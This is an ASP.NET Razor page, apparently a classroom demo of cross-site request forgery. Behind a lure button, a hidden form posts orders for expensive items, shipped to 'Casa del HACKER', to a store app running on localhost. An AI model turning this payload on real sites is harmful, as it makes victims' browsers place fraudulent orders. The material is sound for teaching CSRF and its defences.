@{
    ViewData["Title"] = "Home Page";
}

<div class="text-center">
    <h1 class="display-4">Página para los incautos</h1>
    @* COPIAMOS AQUI EL FORMULARIO DEL PRODUCTOS *@
    <form method="post" action="https://localhost:7018/Tienda/Productos">
        <input type="hidden" name="direccion" value="Casa del HACKER" />
        <button class="btn btn-danger"> Juega conmigo...</button>
        <input type="hidden" name="producto" value="Tesla 40.000€" />
        <input type="hidden" name="producto" value="IPhone 19 5.000€" />
        <input type="hidden" name="producto" value="Ordenador Gaming 2.500€" />
        <input type="hidden" name="producto" value="Arbitros Negreira 900.000€" />
    </form>
    <img src="https://static.eldiario.es/clip/f1b72756-9e78-4e4f-9234-c563da87bcdb_16-9-discover-aspect-ratio_default_0.jpg"
         style="width:300px; height: 300px" />
</div>